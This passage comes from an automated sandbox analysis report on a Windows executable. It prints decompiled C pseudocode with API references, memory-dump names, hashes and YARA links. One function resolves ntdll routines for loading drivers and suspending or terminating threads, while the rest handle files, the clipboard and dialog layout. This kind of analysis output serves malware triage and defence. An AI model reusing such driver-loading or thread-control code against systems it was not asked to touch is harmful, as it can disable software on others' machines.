					if(_t29 == 0) {
						break;
					}
					_t31 = _t31 + 1;
					if(_t31 <  *((intOrPtr*)(_t40 + 0x428))) {
						continue;
					}
					goto L3;
				}
				_t20 = _v12;
				goto L4;
			}

0x004048da
0x004048da
0x004048dd
0x004048de
0x004048e1
0x004048e5
0x004048e8
0x004048ea
0x004048f6
0x004048f9
0x00404923
0x00404923
0x00404925
0x00404927
0x0040492e
0x00404933
0x00404935
0x00404946
0x0040494d
0x00404959
0x0040495e
0x00404963
0x00404966
0x00404966
0x00404935
0x00404970
0x00000000
0x00000000
0x00000000
0x004048fb
0x004048fb
0x00404903
0x00404908
0x0040490b
0x0040490f
0x00404917
0x00404918
0x00000000
0x00000000
0x0040491a
0x00404921
0x00000000
0x00000000
0x00000000
0x00404921
0x00404973
0x00000000

APIs

_wcsicmp.MSVCRT ref: 0040490F

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsicmp
String ID:
API String ID: 2081463915-0
Opcode ID: 1a5aa7950c8524b605f159770a309709ad0bf62fba3d30ff973a537a5b72f3ad
Instruction ID: fdc747c80fe88fd67bd043bcbe7cc9eb3f50563aa05d6d30472a65970944665d
Opcode Fuzzy Hash: 1a5aa7950c8524b605f159770a309709ad0bf62fba3d30ff973a537a5b72f3ad
Instruction Fuzzy Hash: 9D115EF5600205AFC710DF79C88099AB7B8FF48354F10453EEA55E3240D734A9508BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403FDE, Relevance: 1.3, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403FDE(void** __eax, void* __eflags, WCHAR* _a4) {
				void* __ecx;
				void* __esi;
				intOrPtr _t11;
				void* _t14;
				intOrPtr _t15;
				intOrPtr* _t16;
				intOrPtr* _t22;

				_t22 = __eax;
				 *(__eax + 0x414) =  *(__eax + 0x414) & 0x00000000;
				E0040405E(__eax);
				_t11 = E00405338(_a4);
				 *_t22 = _t11;
				if(_t11 == 0xffffffff) {
					L7:
					 *((intOrPtr*)(_t22 + 0x414)) = GetLastError();
					L8:
					return 0;
				}
				_t14 = E00405E43(_t22 + 4, _t11, _t22 + 4, 0x400); // executed
				if(_t14 == 0) {
					goto L7;
				}
				_t15 =  *((intOrPtr*)(_t22 + 0x418));
				if( *((intOrPtr*)(_t15 + 4)) == 0x89abcdef) {
					_t16 = _t15 + 0xec;
					__eflags =  *_t16;
					if(__eflags == 0) {
						 *_t16 = 0x1000;
					}
					E00404541(__eflags, _t22); // executed
					return 1;
				}
				 *((intOrPtr*)(_t22 + 0x414)) = 0xfff1;
				goto L8;
			}

0x00403fe0
0x00403fe2
0x00403fe9
0x00403ff2
0x00403ffb
0x00403ffd
0x0040404b
0x00404051
0x00404057
0x00000000
0x00404057
0x00404009
0x00404013
0x00000000
0x00000000
0x00404015
0x00404022
0x00404030
0x00404035
0x00404038
0x0040403a
0x0040403a
0x00404041
0x00000000
0x00404048
0x00404024
0x00000000

APIs

Part of subcall function 0040405E: FindCloseChangeNotification.KERNELBASE(00000000,00403FC6,?,0040BE7E), ref: 00404066

Part of subcall function 00405338: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A

GetLastError.KERNEL32(?,00000000,00403B9A,?), ref: 0040404B

Part of subcall function 00405E43: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ChangeCloseCreateErrorFindLastNotificationRead
String ID:
API String ID: 4176926985-0
Opcode ID: 28e05b3785312bd73728d28a7b4e7de4c452789e56a0673e54d11ff134628f3e
Instruction ID: 1be67c3d07cfbe594be31b534527c337e1243451ed86295bd1db7fefa69627cd
Opcode Fuzzy Hash: 28e05b3785312bd73728d28a7b4e7de4c452789e56a0673e54d11ff134628f3e
Instruction Fuzzy Hash: FD01D1F10016008AD320AB20C805B9376E8DF91315F10893FE3A6F72C1EB7C98818AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406355, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406355(signed int* __esi) {
				void* _t5;
				signed int* _t7;

				_t7 = __esi;
				_t5 =  *__esi;
				if(_t5 != 0) {
					free(_t5); // executed
					 *__esi =  *__esi & 0x00000000;
				}
				_t7[1] = _t7[1] & 0x00000000;
				_t7[2] = _t7[2] & 0x00000000;
				return _t5;
			}

0x00406355
0x00406355
0x00406359
0x0040635c
0x00406361
0x00406364
0x00406365
0x00406369
0x0040636d

APIs

free.MSVCRT(00000000,004065BB,75144E00,?,00000000), ref: 0040635C

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 087bb4fc264830983fe200f1886ef8bdbde26bdfe1ad20cb23c944558e33102c
Instruction ID: 3b7e158b20e84301f479c6044b2c5b8c75456169b8cefd1b15b644340405c36b
Opcode Fuzzy Hash: 087bb4fc264830983fe200f1886ef8bdbde26bdfe1ad20cb23c944558e33102c
Instruction Fuzzy Hash: 8FC04C72910B019BE7349F26D449766B3E4BF1073BF618C2DA4D5914C1DBBCE494CA18

Uniqueness

Uniqueness Score: -1.00%

Function 00403F55, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F55(void** __esi) {
				void* _t5;
				signed int* _t7;

				_t7 = __esi;
				_t5 =  *__esi;
				if(_t5 != 0) {
					free(_t5); // executed
				}
				 *_t7 =  *_t7 & 0x00000000;
				_t7[3] = _t7[3] & 0x00000000;
				_t7[1] = _t7[1] & 0x00000000;
				return _t5;
			}

0x00403f55
0x00403f55
0x00403f59
0x00403f5c
0x00403f61
0x00403f62
0x00403f65
0x00403f69
0x00403f6d

APIs

free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: ca8b33ba02bdd68b061cc876ecb80c5c4dc103e44f57bd864d81743fd2e6ef53
Instruction ID: 3143f4fb3421a8fd8d8aef00c743a9b8e7153b02c0e56cadf99ac6914a485b7f
Opcode Fuzzy Hash: ca8b33ba02bdd68b061cc876ecb80c5c4dc103e44f57bd864d81743fd2e6ef53
Instruction Fuzzy Hash: 48C00272910B019FE7309E26C405B66B7E8AF1073BF918C1D94D5914C1D7BCD4448A14

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040C41D, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C41D() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x4132c4 == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x4132c4 = _t2;
					 *0x413294 = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x413298 = GetProcAddress( *0x4132c4, "NtLoadDriver");
					 *0x41329c = GetProcAddress( *0x4132c4, "NtUnloadDriver");
					 *0x4132a0 = GetProcAddress( *0x4132c4, "NtOpenSymbolicLinkObject");
					 *0x4132a4 = GetProcAddress( *0x4132c4, "NtQuerySymbolicLinkObject");
					 *0x4132a8 = GetProcAddress( *0x4132c4, "NtQueryObject");
					 *0x4132ac = GetProcAddress( *0x4132c4, "NtOpenThread");
					 *0x4132b0 = GetProcAddress( *0x4132c4, "NtClose");
					 *0x4132b4 = GetProcAddress( *0x4132c4, "NtQueryInformationThread");
					 *0x4132b8 = GetProcAddress( *0x4132c4, "NtSuspendThread");
					 *0x4132bc = GetProcAddress( *0x4132c4, "NtResumeThread");
					_t14 = GetProcAddress( *0x4132c4, "NtTerminateThread");
					 *0x4132c0 = _t14;
					return _t14;
				}
				return _t1;
			}

0x0040c424
0x0040c430
0x0040c442
0x0040c454
0x0040c466
0x0040c478
0x0040c48a
0x0040c49c
0x0040c4ae
0x0040c4c0
0x0040c4d2
0x0040c4e4
0x0040c4f6
0x0040c508
0x0040c50d
0x0040c50f
0x00000000
0x0040c514
0x0040c515

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,?,0040C596,?,?,00000000), ref: 0040C430
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040C447
GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040C459
GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040C46B
GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040C47D
GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040C48F
GetProcAddress.KERNEL32(NtQueryObject), ref: 0040C4A1
GetProcAddress.KERNEL32(NtOpenThread), ref: 0040C4B3
GetProcAddress.KERNEL32(NtClose), ref: 0040C4C5
GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 0040C4D7
GetProcAddress.KERNEL32(NtSuspendThread), ref: 0040C4E9
GetProcAddress.KERNEL32(NtResumeThread), ref: 0040C4FB
GetProcAddress.KERNEL32(NtTerminateThread), ref: 0040C50D

Strings

NtQuerySystemInformation, xrefs: 0040C43C
NtLoadDriver, xrefs: 0040C449
ntdll.dll, xrefs: 0040C42B
NtResumeThread, xrefs: 0040C4EB
NtSuspendThread, xrefs: 0040C4D9
NtTerminateThread, xrefs: 0040C4FD
NtQueryObject, xrefs: 0040C491
NtOpenSymbolicLinkObject, xrefs: 0040C46D
NtUnloadDriver, xrefs: 0040C45B
NtQueryInformationThread, xrefs: 0040C4C7
NtOpenThread, xrefs: 0040C4A3
NtQuerySymbolicLinkObject, xrefs: 0040C47F
NtClose, xrefs: 0040C4B5

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
API String ID: 667068680-4280973841
Opcode ID: 0eddc1e60b10c18c4745ef63ef14c7ef42ad6bc27fe304210325578cd75792ce
Instruction ID: 58691313bf47f16c5c12281129ebfbb01f3831da172bf8a538c636a3e5316245
Opcode Fuzzy Hash: 0eddc1e60b10c18c4745ef63ef14c7ef42ad6bc27fe304210325578cd75792ce
Instruction Fuzzy Hash: 27119778D41325AECB12BF71AD09ACA7EB1E764B5671084F7A408722F0D6B942A0DF4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE4D, Relevance: 1.5, APIs: 1, Instructions: 21
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AE4D(signed int __eax, void* __ecx, void* __edx, void* __esi, void* __eflags) {
				void* __edi;
				int _t11;
				void* _t13;
				void* _t15;
				void* _t17;

				_t15 = __edx;
				_t13 = __ecx;
				_t16 = __esi + 0x6ac;
				E0040637A(__eax | 0xffffffff, __esi + 0x6ac, 0x40f454);
				 *((intOrPtr*)(__esi + 0x6bc)) = 0x4000;
				E0040AE99(_t13, _t15, __esi,  *((intOrPtr*)(__esi + 0x69c)));
				_t17 = E0040636E(_t16);
				_t11 = OpenClipboard( *(__esi + 0x208));
				if(_t11 != 0) {
					return E004054F1(_t17);
				}
				return _t11;
			}

0x0040ae4d
0x0040ae4d
0x0040ae4e
0x0040ae5c
0x0040ae67
0x0040ae72
0x0040ae84
0x0040ae86
0x0040ae8e
0x00000000
0x0040ae96
0x0040ae98

APIs

Part of subcall function 0040637A: wcslen.MSVCRT ref: 0040638D
Part of subcall function 0040637A: memcpy.MSVCRT ref: 004063AC

Part of subcall function 0040AE99: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0040AEEB

OpenClipboard.USER32(?), ref: 0040AE86

Part of subcall function 004054F1: EmptyClipboard.USER32(?,?,0040AE96,00000000), ref: 004054F9
Part of subcall function 004054F1: wcslen.MSVCRT ref: 00405506
Part of subcall function 004054F1: GlobalAlloc.KERNEL32(00002000,00000002,00000000,?,?,?,0040AE96,00000000), ref: 00405516
Part of subcall function 004054F1: GlobalLock.KERNEL32 ref: 00405523
Part of subcall function 004054F1: memcpy.MSVCRT ref: 0040552C
Part of subcall function 004054F1: GlobalUnlock.KERNEL32(00000000), ref: 00405535
Part of subcall function 004054F1: SetClipboardData.USER32 ref: 0040553E
Part of subcall function 004054F1: CloseClipboard.USER32(?,?,0040AE96,00000000), ref: 0040554E

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$Global$memcpywcslen$AllocCloseDataEmptyLockMessageOpenSendUnlock
String ID:
API String ID: 2178300729-0
Opcode ID: 2bf5dca165b34132fb64bb1855b861156878277b56bd8399cb3bfe959ead56f4
Instruction ID: d2c7d0a254bb278864896b88801620e30a707c529b051fe324ebedfb26bf80ea
Opcode Fuzzy Hash: 2bf5dca165b34132fb64bb1855b861156878277b56bd8399cb3bfe959ead56f4
Instruction Fuzzy Hash: F0E0DFB1100B0056C6217736A801B9B76A26F80324B100B3EF8A6B11E2CB3960AA9A49

Uniqueness

Uniqueness Score: -1.00%

Function 0040D12C, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040D12C(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, signed int _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, short _a72, intOrPtr _a76, struct tagRECT _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a584) {
				signed int _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v52;
				struct HWND__* _v56;
				struct HWND__* _v60;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct HDC__* _t169;
				struct HWND__* _t171;
				intOrPtr _t220;
				void* _t221;
				intOrPtr _t232;
				struct HWND__* _t234;
				void* _t237;
				intOrPtr* _t271;
				signed int _t272;
				signed int _t273;

				_t271 = __esi;
				_t273 = _t272 & 0xfffffff8;
				E0040E340(0x4298, __ecx);
				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x44)) + 0x2e4));
				_t234 = GetDlgItem( *(__esi + 0x10), 0x3e9);
				_a4 = GetDlgItem( *(__esi + 0x10), 0x3e8);
				_a20 = GetWindowLongW(_t234, 0xfffffff0);
				_a24 = GetWindowLongW(_a4, 0xfffffff0);
				_a96 = GetWindowLongW(_t234, 0xffffffec);
				_a36 = GetWindowLongW(_a4, 0xffffffec);
				GetWindowRect(_t234,  &_a100);
				GetWindowRect(_a4,  &_a60);
				MapWindowPoints(0,  *(__esi + 0x10),  &_a100, 2);
				MapWindowPoints(0,  *(__esi + 0x10),  &_a60, 2);
				_t237 = _a108 - _a100.x;
				_a4 = _a4 & 0x00000000;
				_a28 = _a68 - _a60.x;
				_a76 = _a112 - _a104;
				_a40 = _a72 - _a64;
				_t169 = GetDC( *(__esi + 0x10));
				_a16 = _t169;
				if(_t169 == 0) {
					L9:
					_v0 = _v0 & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)) <= 0) {
						L12:
						_t171 = GetDlgItem( *(_t271 + 0x10), 1);
						_a36 = _t171;
						GetWindowRect(_t171,  &_a44);
						MapWindowPoints(0,  *(_t271 + 0x10),  &_a44, 2);
						GetClientRect( *(_t271 + 0x10),  &_a124);
						GetWindowRect( *(_t271 + 0x10),  &_a80);
						SetWindowPos( *(_t271 + 0x10), 0, 0, 0, _a88 - _a80.left + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
						GetClientRect( *(_t271 + 0x10),  &_a80);
						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
					}
					_a20 = _a20 | 0x10000000;
					_a24 = _a24 | 0x10000000;
					_a8 = _a12 + 0x10;
					do {
						 *((intOrPtr*)( *_t271 + 0x20))(_v0);
						_v24 = E00401551(_t271, _a92, L"STATIC", _a16, _a96, _v0 + _a100.x, _t237, _a72);
						_v52 = E00401551(_t271, _v0, L"EDIT", _v12, _a24, _v32 + _a28, _v8,  *(_t271 + 0x48) * _a4);
						L0040DFD6();
						_t273 = _t273 + 0x10;
						SetWindowTextW(_v56,  &_a72);
						SetWindowTextW(_v60,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x40))))))(_v68,  &_a584,  &_a72, 0xff, L"%s:", _v60->i));
						_v68 = _v68 + 0x14;
						_v72 = _v72 +  *(_t271 + 0x48) * _v36 +  *((intOrPtr*)(_t271 + 0x4c));
						_v76 = _v76 + 1;
					} while (_v76 <  *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)));
					goto L12;
				}
				_t220 = 0;
				_a32 = _a32 & 0;
				_a8 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x44)) + 0x2e0)) <= 0) {
					L8:
					_t221 = _t220 - _t237;
					_a28 = _a28 - _t221;
					_a60.x = _a60.x + _t221;
					_t237 = _t237 + _t221;
					ReleaseDC( *(_t271 + 0x10), _a16);
					goto L9;
				}
				_v0 = _a12 + 0x10;
				do {
					if(GetTextExtentPoint32W(_a16,  *_v0, wcslen( *_v0),  &_a116) != 0) {
						_t232 = _a100.x + 0xa;
						if(_t232 > _v8) {
							_v8 = _t232;
						}
					}
					_a16 =  &(_a16->i);
					_v16 = _v16 + 0x14;
				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)));
				_t220 = _v8;
				goto L8;
			}

0x0040d12c
0x0040d12f
0x0040d137
0x0040d155
0x0040d163
0x0040d170
0x0040d17c
0x0040d185
0x0040d191
0x0040d19d
0x0040d1a7
0x0040d1b2
0x0040d1c6
0x0040d1d4
0x0040d1e5
0x0040d1e9
0x0040d1ee
0x0040d1fd
0x0040d209
0x0040d20d
0x0040d215
0x0040d219
0x0040d2b1
0x0040d2b4
0x0040d2c0
0x0040d3d1
0x0040d3d6
0x0040d3e2
0x0040d3e6
0x0040d3f4
0x0040d40b
0x0040d415
0x0040d45b
0x0040d465
0x0040d4a4
0x0040d4a4
0x0040d2d1
0x0040d2e2
0x0040d2e6
0x0040d2ea
0x0040d2f2
0x0040d323
0x0040d352
0x0040d36e
0x0040d373
0x0040d382
0x0040d3a0
0x0040d3b1
0x0040d3b6
0x0040d3ba
0x0040d3c5
0x00000000
0x0040d2ea
0x0040d222
0x0040d224
0x0040d22e
0x0040d232
0x0040d298
0x0040d29c
0x0040d2a1
0x0040d2a5
0x0040d2a9
0x0040d2ab
0x00000000
0x0040d2ab
0x0040d23b
0x0040d23f
0x0040d266
0x0040d26f
0x0040d276
0x0040d278
0x0040d278
0x0040d276
0x0040d27c
0x0040d287
0x0040d28c
0x0040d294
0x00000000

APIs

GetDlgItem.USER32 ref: 0040D159
GetDlgItem.USER32 ref: 0040D165
GetWindowLongW.USER32(00000000,000000F0), ref: 0040D174
GetWindowLongW.USER32(?,000000F0), ref: 0040D180
GetWindowLongW.USER32(00000000,000000EC), ref: 0040D189
GetWindowLongW.USER32(?,000000EC), ref: 0040D195
GetWindowRect.USER32 ref: 0040D1A7
GetWindowRect.USER32 ref: 0040D1B2
MapWindowPoints.USER32 ref: 0040D1C6
MapWindowPoints.USER32 ref: 0040D1D4
GetDC.USER32 ref: 0040D20D
wcslen.MSVCRT ref: 0040D24D
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0040D25E
ReleaseDC.USER32 ref: 0040D2AB
_snwprintf.MSVCRT ref: 0040D36E
SetWindowTextW.USER32(?,?), ref: 0040D382
SetWindowTextW.USER32(?,00000000), ref: 0040D3A0
GetDlgItem.USER32 ref: 0040D3D6
GetWindowRect.USER32 ref: 0040D3E6
MapWindowPoints.USER32 ref: 0040D3F4
GetClientRect.USER32 ref: 0040D40B
GetWindowRect.USER32 ref: 0040D415
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040D45B
GetClientRect.USER32 ref: 0040D465
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040D49D

Strings

STATIC, xrefs: 0040D30D
%s:, xrefs: 0040D363
EDIT, xrefs: 0040D343

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
String ID: %s:$EDIT$STATIC
API String ID: 2080319088-3046471546
Opcode ID: c102a7a5600ef86d24e901ec56d59f6fa3db94701319a0c7660b80572fc7c6b1
Instruction ID: af222cd68e1cf1c2961fcc0c9276d13d323a9bd1d9fa968012e99cc026c1ed94
Opcode Fuzzy Hash: c102a7a5600ef86d24e901ec56d59f6fa3db94701319a0c7660b80572fc7c6b1
Instruction Fuzzy Hash: D4B1C171508301AFD720DFA8C985E6BBBF9FF88714F00492DF695962A1D775E8088F16

Uniqueness

Uniqueness Score: -1.00%

Function 0040A742, Relevance: 47.6, APIs: 22, Strings: 5, Instructions: 303
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040A742(void* __ecx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __esi;
				struct HMENU__* _t123;
				struct HWND__* _t125;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t139;
				void* _t187;
				long _t193;
				void* _t198;
				void* _t200;
				void* _t216;
				long _t218;
				intOrPtr _t220;
				intOrPtr _t221;
				void* _t222;
				int _t225;
				void* _t226;
				intOrPtr* _t228;
				intOrPtr* _t229;
				void* _t231;
				void* _t232;
				intOrPtr* _t233;
				long _t241;

				_t229 = _t231 - 0x78;
				_t232 = _t231 - 0xa4;
				 *((char*)(_t229 - 0x23)) = 1;
				_t187 = __ecx;
				 *(_t229 - 0x2c) = 0;
				 *((intOrPtr*)(_t229 - 0x28)) = 0;
				 *((char*)(_t229 - 0x24)) = 0;
				 *((char*)(_t229 - 0x22)) = 0;
				 *((char*)(_t229 - 0x21)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t229 - 0x18) = 1;
				 *((intOrPtr*)(_t229 - 0x14)) = 0x9c41;
				 *((char*)(_t229 - 0x10)) = 4;
				 *((char*)(_t229 - 0xf)) = 0;
				 *((char*)(_t229 - 0xe)) = 0;
				 *((char*)(_t229 - 0xd)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 - 4)) = 5;
				 *_t229 = 0x9c44;
				 *((char*)(_t229 + 4)) = 4;
				 *((char*)(_t229 + 5)) = 0;
				 *((char*)(_t229 + 6)) = 0;
				 *((char*)(_t229 + 7)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t229 + 0x10) = 2;
				 *((intOrPtr*)(_t229 + 0x14)) = 0x9c48;
				 *((char*)(_t229 + 0x18)) = 4;
				 *((char*)(_t229 + 0x19)) = 0;
				 *((char*)(_t229 + 0x1a)) = 0;
				 *((char*)(_t229 + 0x1b)) = 0;
				 *(_t229 + 0x68) =  *(_t229 + 0x68) | 0xffffffff;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 + 0x24)) = 3;
				 *((intOrPtr*)(_t229 + 0x28)) = 0x9c49;
				 *((char*)(_t229 + 0x2c)) = 4;
				 *((char*)(_t229 + 0x2d)) = 0;
				 *((char*)(_t229 + 0x2e)) = 0;
				 *((char*)(_t229 + 0x2f)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 + 0x38)) = 0;
				 *((intOrPtr*)(_t229 + 0x3c)) = 0x9c4e;
				 *((char*)(_t229 + 0x40)) = 4;
				 *((char*)(_t229 + 0x41)) = 0;
				 *((char*)(_t229 + 0x42)) = 0;
				 *((char*)(_t229 + 0x43)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 + 0x4c)) = 4;
				 *((intOrPtr*)(_t229 + 0x50)) = 0x9c42;
				 *((char*)(_t229 + 0x54)) = 4;
				 *((char*)(_t229 + 0x55)) = 0;
				 *((char*)(_t229 + 0x56)) = 0;
				 *((char*)(_t229 + 0x57)) = 0;
				asm("stosd");
				_t216 = 0x66;
				asm("stosd");
				_t123 = E00406AFA(_t216);
				 *(__ecx + 0x21c) = _t123;
				SetMenu( *(__ecx + 0x208), _t123);
				_t125 = CreateStatusWindowW(0x50000000, 0x40f454,  *(_t187 + 0x208), 0x101);
				 *(_t187 + 0x214) = _t125;
				SendMessageW(_t125, 0x404, 1, _t229 + 0x68);
				 *(_t187 + 0x218) = CreateToolbarEx( *(_t187 + 0x208), 0x50010900, 0x102, 6, 0, E00405F82(), _t229 - 0x2c, 7, 0x10, 0x10, 0x60, 0x10, 0x14);
				 *(_t229 + 0x74) = ImageList_Create(0x10, 0x10, 0x18, 0, 1);
				_t131 = E00402DE1(__fp0);
				 *(_t229 + 0x70) = _t131;
				ImageList_Add( *(_t229 + 0x74), _t131, 0);
				DeleteObject( *(_t229 + 0x70));
				SendMessageW( *(_t187 + 0x218), 0x436, 0,  *(_t229 + 0x74));
				_t135 =  *((intOrPtr*)(_t187 + 0x69c));
				_t236 =  *((intOrPtr*)(_t135 + 0x2f4));
				_t218 = 0x50810809;
				if( *((intOrPtr*)(_t135 + 0x2f4)) != 0) {
					_t218 = 0x50811809;
				}
				E00401EA3( *((intOrPtr*)(_t187 + 0x69c)), _t236, CreateWindowExW(0, L"SysListView32", 0, _t218, 0, 0, 0x190, 0xc8,  *(_t187 + 0x208), 0x103, GetModuleHandleW(0), 0), 1);
				_t139 =  *((intOrPtr*)(_t187 + 0x69c));
				_t193 =  *(_t139 + 0x2e0);
				_t220 =  *((intOrPtr*)(_t139 + 0x2e4));
				 *(_t229 + 0x70) =  *(_t139 + 0x2ac);
				if(_t193 <= 0) {
					L5:
					 *( *((intOrPtr*)(_t187 + 0x69c)) + 0x340) =  *(_t187 + 0x214);
					_t221 =  *((intOrPtr*)(_t187 + 0x69c));
					E004099C4(_t221);
					ImageList_ReplaceIcon( *(_t221 + 0x2b4), 0, LoadIconW(GetModuleHandleW(0), 0x66));
					_t222 = 0x68;
					 *((intOrPtr*)(_t187 + 0x278)) = E00406AFA(_t222);
